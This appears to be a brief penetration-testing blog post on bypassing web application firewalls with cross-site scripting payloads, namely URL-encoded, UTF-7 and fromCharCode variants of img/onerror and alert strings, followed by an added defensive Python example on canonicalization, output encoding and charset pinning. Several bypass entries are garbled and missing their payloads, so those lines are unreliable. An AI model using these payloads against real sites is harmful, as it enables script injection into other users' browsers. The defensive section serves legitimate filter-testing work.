Cross site scripting, XSS, bypass XSS filter, xss payload

Cross Site Scripting (XSS) is a web application vulnerability that arises when data is output to the page without proper handling, which lets an attacker construct malicious data that is then displayed in the page. Because cross-site scripting attacks write a malicious script or HTML code into the page content, a cross-site scripting vulnerability is also known as an HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert('123')jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:

Case insensitive: alert('123')

use other tag: XSS
<img a=”

use comment: %0aalert(1);

Two-letter bypass:


Other events bypass: onload
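Seen from the defending side, the encoded forms listed above get past filters that match signatures on the request exactly as received. The following added example (not part of the original post) compares raw matching with matching on a canonical form, and shows output encoding and a pinned charset as the controls that hold. The signature list, function names and the mixed-case sample are assumptions made for illustration.

```python
import html
from urllib.parse import unquote

# Constructed signature list standing in for a simple WAF rule set (assumption).
SIGNATURES = ("<script", "<img", "onerror=", "onload=")

def matches_raw(value: str) -> bool:
    """Naive filter: look for signatures in the value exactly as received."""
    return any(sig in value for sig in SIGNATURES)

def canonicalize(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, then fold case."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.casefold()

def matches_canonical(value: str) -> bool:
    """Same signatures, applied to the canonical form of the input."""
    return matches_raw(canonicalize(value))

def render_comment(value: str) -> str:
    """Primary defence: encode for the HTML body context at output time.
    unquote() models the single decode a web framework performs on input."""
    return "<p>" + html.escape(unquote(value), quote=True) + "</p>"

def response_headers() -> dict:
    """Pin the charset so a browser never guesses UTF-7 for the '+ADw-' form."""
    return {"Content-Type": "text/html; charset=utf-8",
            "X-Content-Type-Options": "nosniff"}

# Inputs: the two encoded strings quoted on this page, plus a constructed
# mixed-case variant of the same markup.
SAMPLES = {
    "url": "%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E",
    "utf7": "+ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-",
    "case": "<IMG SRC=x OnErRoR=prompt(1)>",
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, matches_raw(sample), matches_canonical(sample),
              render_comment(sample))
```

The UTF-7 sample matches neither filter and passes through `html.escape` unchanged, so for that form the explicit charset in the response headers is the control that matters, not the signature list.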

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux.

